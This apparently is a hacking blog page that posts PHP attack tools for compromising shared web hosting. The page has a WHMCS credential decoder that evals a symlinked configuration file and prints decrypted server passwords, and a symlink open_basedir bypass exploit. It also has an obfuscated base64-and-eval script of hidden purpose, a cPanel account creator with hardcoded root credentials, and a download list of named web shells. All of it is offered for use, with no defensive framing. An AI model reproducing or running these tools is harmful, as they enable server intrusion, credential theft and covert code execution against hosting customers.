IamNot-Hacker

WP Hacked By Symlink

Post by Unknown Posted on 21:12 with No comments

Smart Hunter v.1.4.3

Post by Unknown Posted on 21:11 with No comments

Smart Hunter v.1.4.3

SREENSHOT :

Video Presentation of version 1.2

Code:
http://www.youtube.com/watch?v=vbnSBNTxXbM

Download Smart Hunter

Code:
http://www.mediafire.com/?4vzcbm1j7imq14d
Login Password : fuck lamers

ENJOY IT !! :)

WHCMS Server Password Decoder

Post by Unknown Posted on 21:10 with No comments

<?php

###########################################
# WHMCS Server Password decoder #
# #
# recoded by ilyas_robert
#Note : I'm Proud to be ~~h4ck3r~~ #
####################################

function decrypt ($string,$cc_encryption_hash)
{
$key = md5 (md5 ($cc_encryption_hash)) . md5
($cc_encryption_hash);
$hash_key = _hash ($key);
$hash_length = strlen ($hash_key);
$string = base64_decode ($string);
$tmp_iv = substr ($string, 0, $hash_length);
$string = substr ($string, $hash_length, strlen ($string) -
$hash_length);
$iv = $out = '';
$c = 0;
while ($c < $hash_length)
{
$iv .= chr (ord ($tmp_iv[$c]) ^ ord ($hash_key[$c]));
++$c;
}
$key = $iv;
$c = 0;
while ($c < strlen ($string))
{
if (($c != 0 AND $c % $hash_length == 0))
{
$key = _hash ($key . substr ($out, $c - $hash_length,
$hash_length));
}
$out .= chr (ord ($key[$c % $hash_length]) ^ ord ($string
[$c]));
++$c;
}
return $out;
}
function _hash ($string)
{
if (function_exists ('sha1'))
{
$hash = sha1 ($string);
}
else
{
$hash = md5 ($string);
}
$out = '';
$c = 0;
while ($c < strlen ($hash))
{
$out .= chr (hexdec ($hash[$c] . $hash[$c + 1]));
$c += 2;
}
return $out;
}
if($_POST['form_action'] == 1 )
{
//include($file);
$file=($_POST['file']);
$****=file_get_contents($file);
$****= str_replace("<?php", "", $****);
$****= str_replace("<?", "", $****);
$****= str_replace("?>", "", $****);
eval($****);
$link=mysql_connect($db_host,$db_user****,$db_pass
word) ;
mysql_select_db($db_****,$link) ;
$query = mysql_query("SELECT * FROM tblservers");
while($v = mysql_fetch_array($query)) {
$ipaddress = $v['ipaddress'];
$user**** = $v['user****'];
$type = $v['type'];
$active = $v['active'];
$host**** = $v['host****'];
echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
echo("<tr><td>Host****</td><td>$host****</td></
tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>User****</td><td>$user****</td></
tr>");
echo("<tr><td>Password</td><td>$password</td></
tr>");
echo "</table><br><br></center>";
}
$link=mysql_connect($db_host,$db_user****,$db_pass
word) ;
mysql_select_db($db_****,$link) ;
$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table border='1'>");
echo("<tr><td>Registrar</td><td>Setting</
td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {
$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>
$value</td></tr>");
}
echo "</table><br><br></center>";
}
if($_POST['form_action'] == 2 )
{
//include($file);
$db_host=($_POST['db_host']);
$db_user****=($_POST['db_user****']);
$db_password=($_POST['db_password']);
$db_****=($_POST['db_****']);
$cc_encryption_hash=($_POST['cc_encryption_hash']);
$link=mysql_connect($db_host,$db_user****,$db_pass
word) ;
mysql_select_db($db_****,$link) ;
$query = mysql_query("SELECT * FROM tblservers");
while($v = mysql_fetch_array($query)) {
$ipaddress = $v['ipaddress'];
$user**** = $v['user****'];
$type = $v['type'];
$active = $v['active'];
$host**** = $v['host****'];
echo("<center><table border='1'>");
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>Type</td><td>$type</td></tr>");
echo("<tr><td>Active</td><td>$active</td></tr>");
echo("<tr><td>Host****</td><td>$host****</td></
tr>");
echo("<tr><td>Ip</td><td>$ipaddress</td></tr>");
echo("<tr><td>User****</td><td>$user****</td></
tr>");
echo("<tr><td>Password</td><td>$password</td></
tr>");
echo "</table><br><br></center>";
}
$link=mysql_connect($db_host,$db_user****,$db_pass
word) ;
mysql_select_db($db_****,$link) ;
$query = mysql_query("SELECT * FROM tblregistrars");
echo("<center>Domain Reseller <br><table border='1'>");
echo("<tr><td>Registrar</td><td>Setting</
td><td>Value</td></tr>");
while($v = mysql_fetch_array($query)) {
$registrar = $v['registrar'];
$setting = $v['setting'];
$value = decrypt ($v['value'], $cc_encryption_hash);
if ($value=="") {
$value=0;
}
$password = decrypt ($v['password'], $cc_encryption_hash);
echo("<tr><td>$registrar</td><td>$setting</td><td>
$value</td></tr>");
}
echo "</table><br><br></center>";
}
?><**** bgcolor="#000000">
<style>
**** { SCROLLBAR-BASE-COLOR: #191919; SCROLLBAR-
ARROW-COLOR: olive; color: white;}
****area{background-color:#191919;color:red;font-
weight:bold;font-size: 12px;font-family: Tahoma; border: 1px
solid #666666;}
input{FONT-WEIGHT:normal;background-color: #191919;font-
size: 13px;font-weight:bold;color: red; font-family: Tahoma;
border: 1px solid #666666;******:17}
</style>
<center>
<font color="#FFFF6FF" size='+3'>[ ~~ WHMCS Server
Password decoder ~~ ]</font><br><br>
<font color="#0066FF" size='+2'>Symlink to
configuration.php of WHMCS</font><br>
</center>
<FORM action="" method="post">
<input type="hidden" ****="form_action" value="1">
<br>
<input type="****" size="30" ****="file" value="">
<br>
<INPUT class=submit type="submit" value="Submit"
****="Submit">
</FORM>
<hr>
<br>
<center>
<font color="#0066FF" size='+2'>DB configuration of
WHMCS</font><br>
</center>
<FORM action="" method="post">
<input type="hidden" ****="form_action" value="2">
<br>
<table border=1>
<tr><td>db_host </td><td><input type="****" size="30"
****="db_host" value="localhost"></td></tr>
<tr><td>db_user**** </td><td><input type="****"
size="30" ****="db_user****" value=""></td></tr>
<tr><td>db_password</td><td><input type="****"
size="30" ****="db_password" value=""></td></tr>
<tr><td>db_****</td><td><input type="****" size="30"
****="db_****" value=""><td></tr>
<tr><td>cc_encryption_hash</td><td><input type="****"
size="30" ****="cc_encryption_hash" value=""></td></tr>
</table>
<br>
<INPUT class=submit type="submit" value="Submit"
****="Submit">
</FORM>
<hr>
<center>
<font color="#0066FF" size='+2'>Password decoder</
font><br>
<?
if($_POST['form_action'] == 3 )
{
$password=($_POST['password']);
$cc_encryption_hash=($_POST['cc_encryption_hash']);
$password = decrypt ($password, $cc_encryption_hash);
echo("Password is ".$password);
}
?>
</center>
<FORM action="" method="post">
<input type="hidden" ****="form_action" value="3">
<br>
<table border=1>
<tr><td>Password</td><td><input type="****" size="30"
****="password" value=""></td></tr>
<tr><td>cc_encryption_hash</td><td><input type="****"
size="30" ****="cc_encryption_hash" value=""></td></tr>
</table>
<br>
<INPUT class=submit type="submit" value="Submit"
****="Submit">
</FORM>
<hr>
<center> <font color="#FFFF6FF" size='+1'>
Email </font><br><br> <center>

Script Symlink Killer

Post by Unknown Posted on 21:08 with 1 comment

BUAT YANG BUTUH SAJA :)

<?php //is safe mod on ? start if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safe="<font color=red>ON</font>"; } else {$safe="<font color=#FF0000>OFF</font>";} echo "<font color=black>SAFE MOD IS :</font><b>$safe</b><br>"; //open safe mod end-- ?> <?php //disable function start echo "<font color=black>Disable functions :</font> <b>"; if(''==($df=@ini_get('disable_functions'))){echo "<font color=black>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} //disable function end-- /* <?php //is safe mod on ? start if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safe="<font color=red>ON</font>"; } else {$safe="<font color=#FF0000>OFF</font>";} echo "<font color=black>SAFE MOD IS :</font><b>$safe</b><br>"; //open safe mod end-- ?> <?php //disable function start echo "<font color=black>Disable functions :</font> <b>"; if(''==($df=@ini_get('disable_functions'))){echo "<font color=black>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} //disable function end-- /* PHP 5.2.12/5.3.1 symlink() open_basedir bypass CHUJWAMWMUZG */ $fakedir="cx"; $fakedep=16; $num=0; // offset of symlink.$num if(!empty($_GET['file'])) $file=$_GET['file']; else if(!empty($_POST['file'])) $file=$_POST['file']; else $file=""; echo '<div align="center"> <div align="center"> <hr> <pre class="ml1"><font color="#FF0000"> </font><font color="#333333"> </font></pre> </div> </div> <p align="center"><b><font face="Tahoma" size="7">!</font></b><font color="#FF0000" face="Tahoma" size="6"> </font><font face="Tahoma" size="6"><font color="#FF0000"><b>Sy</b></font>mLink K<font color="#FF0000"><b>iller</b></font> 0.1</font><font color="#FF0000" face="Tahoma" size="6"> </font><b><font color="#FF0000" face="Tahoma" size="7"> !</font></b></p> <p align="center"><font color="#FF0000" face="Comic Sans MS">Symlink Bypass symlink() open_basedir</font></p> <p align="center"><font face="Comic Sans MS"></font></p> <p align="center"><font face="Comic Sans MS">Nam3 :</font><font color="#FF0000" face="Comic Sans MS"> File Nam3 That u Want T0 Create !n And ch0sse : </font><font face="Comic Sans MS">Rum SymL!nk</font> </p> <p><form name="form" action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF "]).'" method="post"> <p align="center"> <input type="text" name="file" size="50" value="'.htmlspecialchars($file).'" style="border: 1px solid #FF0000"><input type="submit" name="hym" value="Run Symlink" style="color: #FF0000; border: 1px solid #FF0000"></p> <p align="center"><font color="#FF0000" face="Tahoma" size="5">! </font> <font face="Tahoma">Symlink Bypass symlink() open_basedir bypass </font> <font color="#FF0000" face="Tahoma" size="5">!</font></p> <p align="center"><font size="2" face="Tahoma">From :</font><font size="2" color="#FF0000" face="Tahoma"> PHP 5.2.12/5.3.1</font></p> <hr> </form>'; if(empty($file)) exit; if(!is_writable(".")) die("not writable directory"); $level=0; for($as=0;$as<$fakedep;$as++){ if(!file_exists($fakedir)) mkdir($fakedir); chdir($fakedir); } while(1<$as--) chdir(".."); $hardstyle = explode("/", $file); for($a=0;$aa<count($hardstyle);$a++){ if(!empty($hardstyle[$a])){ if(!file_exists($hardstyle[$a])) mkdir($hardstyle[$a]); chdir($hardstyle[$a]); $as++; } } $as++; while($as--) chdir(".."); @rmdir("fakesymlink"); @unlink("fakesymlink"); @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink"); // this loop will skip allready created symlinks. while(1) if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file, "symlink".$num))) break; else $num++; @unlink("fakesymlink"); mkdir("fakesymlink"); die('<FONT COLOR="RED">check symlink <a href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>'); ?>

ENJOY....

[PHP] Subdomain Maker

Post by Unknown Posted on 21:06 with No comments

SREENSHOT :

[+] Save wordlist for subdomain in /public_html/ directory and name it as "domains.txt" <?php /* coded by force ex */$OOO000000=urldecode('%66%67%36%73%62%65%68%70%72%61%34%63%6f%5f%74%6e%64');$GLOBALS['OOO0000O0']=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5}.$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$GLOBALS['OOO0000O0'].=$GLOBALS['OOO0000O0']{3}.$OOO000000{11}.$OOO000000{12}.$GLOBALS['OOO0000O0']{7}.$OOO000000{5};$GLOBALS['OOO000O00']=$OOO000000{0}.$OOO000000{12}.$OOO000000{7}.$OOO000000{5}.$OOO000000{15};$GLOBALS['O0O000O00']=$OOO000000{0}.$OOO000000{1}.$OOO000000{5}.$OOO000000{14};$GLOBALS['O0O000O00']=$O0O000O00.$OOO000000{3};$GLOBALS['O0O00OO00']=$OOO000000{0}.$OOO000000{8}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$GLOBALS['OOO00000O']=$OOO000000{3}.$OOO000000{14}.$OOO000000{8}.$OOO000000{14}.$OOO000000{8};$OOO0O0O00=__FILE__;$OO00O0000=0x18d0;eval($GLOBALS['OOO0000O0']('JE8wMDBPME8wMD0kR0xPQkFMU1snT09PMDAwTzAwJ10oJE9PTzBPME8wMCwncmInKTskR0xPQkFMU1snTzBPMDBPTzAwJ10oJE8wMDBPME8wMCwweDUxMyk7JE9PMDBPMDBPMD0kR0xPQkFMU1snT09PMDAwME8wJ10oJEdMT0JBTFNbJ09PTzAwMDAwTyddKCRHTE9CQUxTWydPME8wME9PMDAnXSgkTzAwME8wTzAwLDB4MWE4KSwnaWxvdmVhaEhBTEVWT0lCYkNjRGRGZkdnSmpLa01tTm5QcFFxUnJTc1R0VXVXd1h4WXlaejAxMjM0NTY3ODkrLz0nLCdBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWmFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6MDEyMzQ1Njc4OSsvJykpO2V2YWwoJE9PMDBPMDBPMCk7'));return;?>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sf[|GL~Y ENJOY ...

cPanel WHM Acc Creator

Post by Unknown Posted on 21:04 with No comments

<?php ############################################################### # cPanel WHM Account Creator 1.1 ############################################################### # Visit http://www.zubrag.com/scripts/ for updates ############################################################### # Required parameters: # - domain - new account domain # - user - new account username # - password - new account password # - package - new account hosting package (plan) # - email - contact email # # Sample run: create-whm-account.php?domain=reseller.com&user=hosting&password=manager&package=unix_500 # # If no parameters passed then input form will be shown to enter data. # # This script can also be run from another PHP script. This may # be helpful if you have some user interface already in place and # want to automatically create WHM accounts from there. # In this case you have to setup following variables instead of # passing them as parameters: # - $user_domain - new account domain # - $user_name - new account username # - $user_pass - new account password # - $user_plan - new account hosting package (plan) # - $user_email - contact email # ############################################################### /////// YOUR WHM LOGIN DATA $whm_user = "root"; // reseller username $whm_pass = "password"; // the password you use to login to WHM ##################################################################################### ############## END OF SETTINGS. DO NOT EDIT BELOW ####################### ##################################################################################### $whm_host = $_SERVER['HTTP_HOST']; function getVar($name, $def = '') { if (isset($_REQUEST[$name])) return $_REQUEST[$name]; else return $def; } // Domain name of new hosting account // To create subdomain just pass full subdomain name // Example: newuser.zubrag.com if (!isset($user_domain)) { $user_domain = getVar('domain'); } // Username of the new hosting account if (!isset($user_name)) { $user_name = getVar('user'); } // Password for the new hosting account if (!isset($user_pass)) { $user_pass = getVar('password'); } // New hosting account Package if (!isset($user_plan)) { $user_plan = getVar('package'); } // Contact email if (!isset($user_email)) { $user_email = getVar('email'); } // if parameters passed then create account if (!empty($user_name)) { // create account on the cPanel server $script = "http://{$whm_user}:{$whm_pass}@{$whm_host}:2086/scripts/wwwacct"; $params = "?plan={$user_plan}&domain={$user_domain}&username={$user_name}&password={$user_pass}&contactemail={$user_email}"; $result = file_get_contents($script.$params); // output result echo "RESULT: " . $result; } // otherwise show input form else { $frm = <<<EOD <html> <head> <title>cPanel/WHM Account Creator</title> <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE"> <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> </head> <body> <style> input { border: 1px solid black; } </style> <form method="post"> <h3>cPanel/WHM Account Creator</h3> <table border="0"> <tr><td>Domain:</td><td><input name="domain" size="30"></td><td>Subdomain or domain, without www</td></tr> <tr><td>Username:</td><td><input name="user" size="30"></td><td>Username to be created</td></tr> <tr><td>Password:</td><td><input name="password" size="30"></td><td></td></tr> <tr><td>Package:</td><td><input name="package" size="30"></td><td>Package (hosting plan) name. Make sure you cpecify existing package</td></tr> <tr><td>Contact Email:</td><td><input name="email" size="30"></td><td></td></tr> <tr><td colspan="3"><br /><input type="submit" value="Create Account"></td></tr> </table> </form> </body> </html> EOD; echo $frm; } ?>

ENJOY :D

Shell LENGKAP

Post by Unknown Posted on 21:04 with No comments

SHELL NAME [ PHP - ASP ]	DOWNLOAD
c99 Shell	txt.zip
r57 1.40 Shell	txt.zip
r57 2.0 Shell	txt.zip
c100 Shell	txt.zip
LOSTDC Shell	txt.zip
GaZa shell	txt.zip
FaTaLisTiCz_Fx Shell	txt.zip
Saudi Shell	txt.zip
g00nshell v1.3 final Shell	txt.zip
c100 Unlimited Shell	txt.zip
Safe0ver Bypass Shell	txt.zip
StressBypass Shell	txt.zip
BLaSTER Kral Shell	txt.zip
ErneBypass Shell	txt.zip
Lolipop Shell	txt.zip
Zehir4 Asp Shell	txt.zip
Tool Asp Shell	txt.zip
Sim Attacker Shell	txt.zip
MysqL Shell	txt.zip
Remview Shell	txt.zip
Small PHP Web Shell	txt.zip
Nst Shell	txt.zip
iskorpitx Shell	txt.zip
Cpanel Shell	txt.zip
ASPYDrvsInfo Asp Shell	txt.zip
Php Bypass Shell	txt.zip
CGI TelneT	txt.zip
Root to "dc.pl"	txt.zip
Ex0 Shell	txt.zip
Sosyete Safe Mode On Bypass Shell	txt.zip
Megabor Shell	txt.zip
Root Shell	txt.zip
ZX Shell	txt.zip
Small Shell	txt.zip
SpyGrup Shell	txt.zip
Soldier of allah Shell	txt.zip
Magiccoder Shell	txt.zip
Zaco Shell	txt.zip
FTP Search	txt.zip
Cyber Warrior Shell	txt.zip
